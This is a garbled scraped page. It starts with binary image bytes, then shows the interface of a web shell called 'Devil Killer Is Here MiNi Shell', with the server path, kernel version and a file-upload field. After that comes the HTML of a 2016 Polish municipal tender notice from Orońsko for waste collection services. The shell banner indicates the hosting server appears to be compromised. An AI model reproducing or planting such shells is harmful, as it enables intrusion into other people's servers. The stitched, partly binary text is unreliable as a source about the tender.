JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160610/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160610/79623-N-2016.html

<p class="kh_header"><b>Orońsko: ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z NIERUCHOMOŚCI ZAMIESZKAŁYCH POŁOŻONYCH NA TERENIE GMINY OROŃSKO ORAZ ORGANIZACJA I PROWADZENIE PUNKTU SELEKTYWNEJ  ZBIÓRKI ODPADÓW KOMUNALNYCH</b><br>
<b>Numer ogłoszenia: 79623 - 2016; data zamieszczenia: 10.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Szkolna 8, 26-505 Orońsko, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oronsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z NIERUCHOMOŚCI ZAMIESZKAŁYCH POŁOŻONYCH NA TERENIE GMINY OROŃSKO ORAZ ORGANIZACJA I PROWADZENIE PUNKTU SELEKTYWNEJ  ZBIÓRKI ODPADÓW KOMUNALNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na odbieraniu zmieszanych odpadów komunalnych, odpadów zbieranych selektywnie, odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego, popiołów i żużla paleniskowego oraz odpadów ulegających biodegradacji od właścicieli nieruchomości na których zamieszkują mieszkańcy z terenu gminy Orońsko i zagospodarowanie odebranych odpadów, tj. odzysk lub unieszkodliwienie, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. z 2016 r., poz. 250). Realizacja usługi będącej przedmiotem zamówienia powinna być zgodna  z obowiązującymi przepisami, w szczególności z ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.), ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. z 2016 r., poz. 250) oraz zapisami Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza, przyjętego uchwałą Sejmiku Województwa Mazowieckiego Nr 211/12  z dnia 22 października 2012 r. oraz zapisami Regulaminu utrzymania czystości i porządku  na terenie gminy Orońsko, przyjętego uchwałą Nr XXXII/188/13 Rady Gminy w Orońsku  z dnia 26 marca 2013 r. Odbiór odpadów będzie odbywał się na terenie całej gminy Orońsko, której obszar zajmuje 8 196 ha, liczba zameldowanych mieszkańców na dzień 30.04.2016 r. wynosi 5938 osób (Zamawiający nie dysponuje odrębnym wykazem z liczbą osób faktycznie zamieszkałych). Szacunkowa liczba nieruchomości wynosi 1350, w tym liczba nieruchomości w zabudowie jednorodzinnej 1341 , a liczba budynków wielorodzinnych (powyżej czterech lokali) - 9 (Łaziska Osiedle). 
Ilości nieruchomości są orientacyjne. Zamawiający zastrzega sobie prawo zmiany ilości punktów odbioru odpadów. Ich ilość w ciągu okresu realizacji zamówienia może wzrosnąć lub zmaleć i jest zależna od złożonych deklaracji przez właścicieli nieruchomości. W skład gminy Orońsko wchodzi 19 sołectw - szczegółowe dane zamieszczono w tabeli  w siwz. W roku 2014 z nieruchomości zamieszkałych na terenie Gminy Orońsko odebrano 375,7 Mg niesegregowanych (zmieszanych) odpadów komunalnych oraz 282,5 Mg odpadów segregowanych (papier i tektura, metale, tworzywa sztuczne, opakowania wielomateriałowe; szkło; odpady ulegające biodegradacji; zużyte opony; popiół; zużyte urządzenia elektryczne i elektroniczne; odpady wielkogabarytowe). W roku 2015 z nieruchomości zamieszkałych na terenie Gminy Orońsko odebrano 343,6 Mg niesegregowanych (zmieszanych) odpadów komunalnych oraz 249,6 Mg odpadów segregowanych (papier i tektura, metale, tworzywa sztuczne, opakowania wielomateriałowe; szkło; odpady ulegające biodegradacji; zużyte opony; popiół; zużyte urządzenia elektryczne i elektroniczne; odpady wielkogabarytowe). W okresie objętym zamówieniem przewiduje się ilości odebranych odpadów na poziomie lat poprzednich, tj. ok. 350 Mg niesegregowanych (zmieszanych) odpadów komunalnych oraz ok. 260 Mg odpadów segregowanych (papier i tektura, metale, tworzywa sztuczne, opakowania wielomateriałowe; szkło; odpady ulegające biodegradacji; zużyte opony; popiół; zużyte urządzenia elektryczne i elektroniczne; odpady wielkogabarytowe). Zakres zamówienia obejmuje: 1. Rodzaje i częstotliwość odbioru odpadów stanowiących przedmiot zamówienia: a) Niesegregowane (zmieszane) odpady komunalne i odpady pozostałe  po wydzieleniu frakcji zbieranych selektywnie - częstotliwość odbioru: z obszarów zabudowy zagrodowej, jednorodzinnej i wielorodzinnej  do czterech lokali włącznie - jeden raz w miesiącu, z obszarów zabudowy wielorodzinnej powyżej czterech lokali - dwa razy 
w miesiącu. b) Odpady zbierane selektywnie (papier i tektura, szkło białe i kolorowe, metale, tworzywa sztuczne, opakowania wielomateriałowe - częstotliwość odbioru: w każdym rodzaju zabudowy - jeden raz w miesiącu. c)	Odpady ulegające biodegradacji  - częstotliwość odbioru: w każdym rodzaju zabudowy - dwa razy w miesiącu w okres od 1 kwietnia do 31 października i jeden raz w miesiącu w okresie od 1 listopada do 31 marca. d) Popioły, żużle paleniskowe powstające w związku z ogrzewaniem budynków mieszkalnych: z obszarów zabudowy zagrodowej, jednorodzinnej i wielorodzinnej  do czterech lokali włącznie - jeden raz w miesiącu w okresie od 1 października do 30 kwietnia, e) Odpady wielkogabarytowe oraz zużyty sprzęt elektryczny i elektroniczny - częstotliwość odbioru: w każdym rodzaju zabudowy - dwa razy w roku (jeden termin na wiosnę, drugi na jesieni). 2. Sposób odbioru odpadów komunalnych a) Odbiór odpadów zgromadzonych w pojemnikach lub workach wystawionych przed wejściem na nieruchomość w zabudowie jednorodzinnej oraz miejsc przeznaczonych na pojemniki w zabudowie wielorodzinnej odbywa się w dni robocze, w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, 
w tym należy zapobiegać wysypywaniu odpadów z pojemników i worków podczas odbioru oraz uprzątać odpady z miejsc ich gromadzenia; należy również zabezpieczyć przewożone odpady przed wysypaniem podczas transportu; w przypadku wysypania Wykonawca obowiązany jest do natychmiastowego uprzątnięcia odpadów oraz skutków ich wysypania (zabrudzeń, plam, itp.);  b) Niesegregowane (zmieszane) odpady komunalne i odpady pozostałe po wydzieleniu frakcji zbieranych selektywnie w zabudowie zagrodowej, jednorodzinnej i wielorodzinnej do czterech lokali włącznie odbierane będą  w systemie pojemnikowo-workowym z pojemników o pojemnościach od 120 do 1100 litrów lub z worków  w kolorze czarnym o pojemności od 60 do 120 litrów; c) Odbiór selektywnie zebranych odpadów w zabudowie zagrodowej, jednorodzinnej i wielorodzinnej do czterech lokali włącznie będzie się odbywać w systemie workowym. Wprowadza się cztery rodzaje worków:- żółty o pojemności od 60  do 120 litrów na odpady z tworzyw sztucznych, metali  i opakowania wielomateriałowe;- niebieski o pojemności od 60  do 120 litrów na odpady z papieru i tektury makulatura, w tym: opakowania, gazety,    czasopisma, itd.;
 - zielony o pojemności od 60  do 120 litrów na odpady ze szkła i opakowania szklane; 
- brązowy  o pojemności od 60  do 120 litrów na odpady ulegające biodegradacji;
d) Popioły i żużle paleniskowe odbierane będą w systemie pojemnikowo-workowym z pojemników o pojemnościach od 120 do 1100 litrów lub z worków w dowolnym kolorze o pojemności od 60 do 120 litrów o parametrach dostosowanych do odbioru tego rodzaju odpadów; e) Niesegregowane (zmieszane) odpady komunalne i odpady pozostałe po wydzieleniu frakcji zbieranych selektywnie w zabudowie wielorodzinnej powyżej czterech lokali - odbierane będą z pojemników o pojemności od 240 do 5500 litrów; f) Odbiór selektywnie zebranych odpadów w zabudowie wielorodzinnej powyżej czterech lokali włącznie odbierane będą z pojemników o pojemności od 240  do 5500 litrów; g) Worki do pierwszego odbioru odpadów  w ilości: po 1 szt. z każdego rodzaju, Wykonawca zobowiązany jest dostarczyć właścicielom nieruchomości          w terminie do 10 dni od zawarcia umowy; h) Nieodebrane z nieruchomości odpady zgodnie z harmonogramem - należy odebrać w przeciągu 24 godzin od otrzymania zawiadomienia fax. lub e-mail od Zamawiającego. Załatwienie reklamacji należy niezwłocznie potwierdzić - fax nr (48) 618 59 18 lub e-mail: srodowisko@oronsko.pl;
i) Wykonawcę obowiązuje zakaz mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi   od właścicieli nieruchomości; j)	Wykonawca ponosi odpowiedzialność za zniszczenie lub uszkodzenie pojemników do gromadzenia odpadów należących do właścicieli nieruchomości, powstałych w związku z realizacją zamówienia. 3. Worki powinny posiadać następujące parametry: materiał folia polietylenowa LDPE, półprzezroczysta, o grubości zapewniającej wytrzymałość worków tj. co najmniej 60 mikronów, opatrzone nadrukiem na jaki rodzaj odpadu są przeznaczone, dodatkowo na workach muszą widnieć adres i dane kontaktowe do Wykonawcy. Zamawiający zastrzega sobie prawo do uzgodnienia szaty graficznej worków przeznaczonych do segregacji odpadów. Obowiązkiem Wykonawcy będzie: uzupełnianie na własny koszt właścicielom nieruchomości jednorodzinnych worków do zbierania odpadów komunalnych - po każdorazowym odbiorze, poprzez pozostawienie przy wejściu na nieruchomość nowych pustych worków w dniu odbioru zebranych odpadów komunalnych, w ilości  odpowiadającej liczbie odebranych worków. 4.	Wykonawca zobowiązany jest do opracowania, po uzgodnieniu z Zamawiającym, harmonogramu odbierania odpadów od właścicieli nieruchomości zamieszkałych, z uwzględnieniem ww. sposobu i częstotliwości odbioru odpadów. Harmonogram powinien być sformułowany w sposób jasny i przejrzysty dla całego obszaru gminy Orońsko i powinien zawierać dane kontaktowe Wykonawcy (nr telefonu). Wykonawca jest zobowiązany do przekazania harmonogramu właścicielom nieruchomości - po 1 egz. w formie papierowej dla każdego właściciela   w następujących terminach: za okres od 1 lipca 2016 r. do 31 grudnia 2016 r. - w terminie do 10 dni  od zawarcia umowy, za okres od 1 stycznia 2017 r. do 30 czerwca 2017 r. - w terminie do końca listopada 2016 r. Do obowiązków Wykonawcy w szczególności należy: 1. Oferowanie właścicielom nieruchomości zakupu lub najmu pojemników. Zakup lub najem będzie przedmiotem umowy cywilno prawnej pomiędzy Wykonawcą  a właścicielem nieruchomości. Oferowane pojemniki muszą być czyste  i estetyczne. Koszt sprzedaży lub najmu pojemników nie może być wliczony w cenę zamówienia. 2. Bieżące zaopatrywanie obsługiwanych nieruchomości w worki o odpowiedniej wytrzymałości do zbiórki odpadów. 3. Wykonywanie przedmiotu zamówienia zgodnie z obowiązującymi przepisami ustawy Prawo ochrony środowiska (tekst jedn Dz. U. z 2016 r., poz. 672) oraz rozporządzeniem wydanym na podstawie art. 9d ust. 2 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. z 2016 r. poz. 250). 4. Wykonanie przedmiotu umowy w sposób sprawny, ograniczający do minimum utrudnienia w ruchu drogowym, korzystaniu z nieruchomości oraz niedogodności dla mieszkańców Gminy Orońsko.
5. Zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe  i jakościowe wykonanie zakresu rzeczowego usługi, jak również odpowiedniego personelu. 6. Okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa. 7. Ponoszenie odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy w zakresie określonym w Kodeksie cywilnym i innych ustawach. 8. Prowadzenie dokumentacji w zakresie sprawozdawczości i przekazywania Zamawiającemu półrocznych sprawozdań zgodnie z art. 9n ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. z 2016 r., poz. 250), do końca miesiąca następującego po upływie półrocza, którego dotyczy. 9. Przekazywanie Zamawiającemu miesięcznych raportów zawierających masę odebranych w danym miesiącu poszczególnych rodzajów odpadów oraz sposób  i miejsce ich zagospodarowania. Raporty wraz z kopiami kart przekazania odpadów i faktur (poświadczonych za zgodność z oryginałem) należy przekazywać  w terminie do 10 dnia miesiąca następującego po miesiącu, którego dotyczy raport.  10. Monitorowanie realizacji obowiązku ciążącego na właścicielu nieruchomości  w zakresie selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z ww. obowiązku, Wykonawca odbiera odpady jako zmieszane odpady komunalne. Wykonawca zobowiązany jest w terminie 3 dni od dnia zaistnienia opisanej sytuacji    do pisemnego lub drogą elektroniczną poinformowania Zamawiającego o niewywiązaniu się z obowiązku segregacji odpadów przez właściciela nieruchomości. Do informacji Wykonawca zobowiązany będzie załączyć dokumentację umożliwiającą identyfikację nieruchomości i zdjęcie fotograficzne na poziomie umożliwiającym wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty.  Sposób zagospodarowania odpadów: 1.  Wykonawca jest zobowiązany do: 
a) przekazywania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji                   do przetwarzania odpadów komunalnych wynikających z wojewódzkiego planu gospodarki odpadami komunalnymi. W przypadku awarii instalacji regionalnej, bądź w stanach odbiegających od normalnej eksploatacji, dopuszcza się skierowanie strumienia odpadów do instalacji zastępczej, określonej   w wojewódzkim planie gospodarki odpadami . b) przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7 ustawy  z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.)  lub samodzielnego zagospodarowania zgodnie z obowiązującymi przepisami, 
c) prowadzenia kart ewidencji odpadów zgodnie z obowiązującymi przepisami.
2.  Wykonawca ma obowiązek zagospodarować odebrane odpady komunalne             w sposób zapewniający osiągnięcie określonych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645) poziomów recyklingu, przygotowania           do ponownego użycia i odzysku następujących frakcji odpadów: papier, metale, tworzywa sztuczne i szkło. 3.  Osiągane przez Wykonawcę poziomy recyklingu, przygotowania do ponownego użycia i odzysku obliczane będą na podstawie wzorów zawartych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645). 
4.  W celu osiągnięcia poziomów recyklingu, przygotowania do ponownego użycia  i odzysku wskazanych frakcji odpadów, Wykonawca zobowiązany jest do maksymalnego ułatwienia właścicielom nieruchomości pozbywania się odpadów papieru, metali, tworzyw sztucznych i szkła oraz odpadów ulegających biodegradacji powstających na terenie nieruchomości, m.in. poprzez odbieranie w/w odpadów zebranych w sposób selektywny u źródła. 5.  Wykonawca może prowadzić działania mające na celu osiągnięcie ww. poziomów recyklingu, przygotowania do ponownego użycia i odzysku, a także ograniczania składowania odpadów ulegających biodegradacji, w szczególności przez: a) umożliwienie właścicielom nieruchomości wynajmu, dzierżawy lub innej formy dysponowania pojemnikami do zbierania odpadów komunalnych, jeżeli zgłoszą oni taką potrzebę na podstawie odrębnych umów (bez ponoszenia kosztów przez Zamawiającego); Zamawiający nie przekaże wykazu właścicieli nieruchomości celem zawarcia przez Wykonawcę umów cywilnych na w/w usługi; b) dostarczanie worków na odpady komunalne zbierane selektywnie.
Wykonawca zobowiązany jest do organizacji i prowadzenia na terenie Gminy Orońsko Punktu Selektywnego Zbierania Odpadów Komunalnych, zwanego dalej PSZOK. PSZOK prowadzi zbiórkę dostarczonych we własnym zakresie przez właścicieli wszystkich nieruchomości na których zamieszkują mieszkańcy, następujących odpadów komunalnych: przeterminowane leki i chemikalia (farby, rozpuszczalniki, oleje odpadowe, itp.), zużyte baterie i akumulatory, zużyty sprzęt elektryczny i elektroniczny, meble i inne odpady wielkogabarytowe - powstające w gospodarstwach domowych, odpady budowlano - remontowe i rozbiórkowe, które powstały w wyniku prowadzenia drobnych robót niewymagających pozwolenia na budowę ani zgłoszenia zamiaru prowadzenia robót do starosty, zużyte opony, tekstylia, opakowania po środkach ochrony roślin powstające w rodzinnych gospodarstwach rolnych
popioły, żużle paleniskowe powstające w związku z ogrzewaniem budynków mieszkalnych. Zamawiający wskaże miejsce lokalizacji ww. punktu PSZOK w miejscowości Guzów, dz. nr ewid. 265/1 ( na terenie składowiska odpadów).
Wskazana działka, na której będzie zlokalizowany PSZOK jest ogrodzona, wyposażona w wagę samochodową (do 30 ton) i w przyłącze wodociągowe. Zamawiający udostępni  teren pod PSZOK nieodpłatnie. Wykonawca zobowiązany jest do przyjęcia dostarczonych do stacjonarnego PSZOK następujących rodzajów odpadów komunalnych:10 01 01 - żużle, popioły paleniskowe i pyły z kotłów (z wyłączeniem pyłów z kotłów wymienionych w 10 01 04), 16 01 03 - zużyte opony, 
17 01 03 - odpady innych materiałów ceramicznych i elementów wyposażenia,
17 0107 - zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów
 ceramicznych i elementów wyposażenia inne niż wymienione w 17 01 06,
20 01 13 - rozpuszczalniki, 20 01 11 - tekstylia, 20 01 21 - lampy fluorescencyjne i inne odpady zawierające rtęć, 20 01 27 - farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne, 
20 01 28 - farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 27, 20 01 31 - leki cytotoksyczne i cytostatyczne, 
20 01 32 - leki inne niż wymienione w 20 01 31, 20 01 33 - baterie i akumulatory łącznie z bateriami i akumulatorami wymienionymi w 16 06 01, 16 06 02 lub 16 06 03 oraz nie sortowane baterie i akumulatory zawierające te baterie, 20 01 34 - baterie i akumulatory inne niż wymienione w 20 01 33, 20 01 35 - zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zawierające niebezpieczne składniki, 20 01 36 - zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i 20 01 35, 20 02 01 - odpady ulegające biodegradacji, 20 03 07 - odpady wielkogabarytowe. 
W PSZOK-u winna być prowadzona ewidencja odpadów przekazywanych przez mieszkańców  z terenu gminy Orońsko. PSZOK powinien być czynny minimum 2 razy w tygodniu,  w godz. 8 - 14. Odbieranie odpadów komunalnych, pochodzących z gospodarstw domowych zbieranych na terenie Punktu Selektywnego Zbierania Odpadów Komunalnych w Guzowie odbywać się będzie  w kontenerach i pojemnikach:
1. Przeterminowane leki i chemikalia, baterie i akumulatory - po jednym pojemniku   o pojemności min. 120 litrów dla każdej grupy odpadów, dostosowanym do ich rodzaju,
2. Zużyty sprzęt elektryczny i elektroniczny, tekstylia, opakowania po środkach ochrony roślin - po jednym pojemniku o pojemności min. 1100 litrów dla każdej grupy odpadów, dostosowanym do ich rodzaju, 3. Meble i odpady wielkogabarytowe, odpady budowlano-remontowe i rozbiórkowe, zużyte opony, popioły i żużle paleniskowe - 1 kontener o pojemności 7 m3 dla każdej grupy odpadów. Wykonawca zobowiązany będzie do dostarczenia własnych kontenerów / pojemników do Punktu Selektywnego Zbierania Odpadów Komunalnych. Obowiązkiem Wykonawcy będzie opracowanie regulaminu PSZOK-u oraz zagospodarowanie odpadów odebranych  z Punku Selektywnego Zbierania Odpadów Komunalnych poprzez przekazanie ich do odzysku lub unieszkodliwienia zgodnie z przepisami obowiązującego prawa oraz przedstawienie Zamawiającemu (jeden raz w miesiącu)  dowodów potwierdzających te czynności, tj. karty przekazania odpadów oraz zestawienia zawierającego dane właściciela i adresu nieruchomości z której pochodzą dostarczone  do PSZOK-u odpady.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium w kwocie 5000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału                   
 w postępowaniu,  w szczególności dotyczące:
   1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w tym: aktualny wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Orońsko w zakresie odbierania odpadów komunalnych od właścicielki nieruchomości na terenie Gminy Orońsko, posiadają aktualne zezwolenie Starosty na transport odpadów komunalnych, posiadają aktualne zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwienia odpadów komunalnych lub gotowość przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzonego działalność 
w zakresie odzysku lub unieszkodliwiania odpadów (miejsca odzysku lub unieszkodliwiania odpadów, o których mowa wyżej powinny spełniać warunki określone w ustawie z dnia 14 grudnia 2012 r. o odpadach, ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach), wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska.
   2)  posiadania wiedzy i doświadczenia;
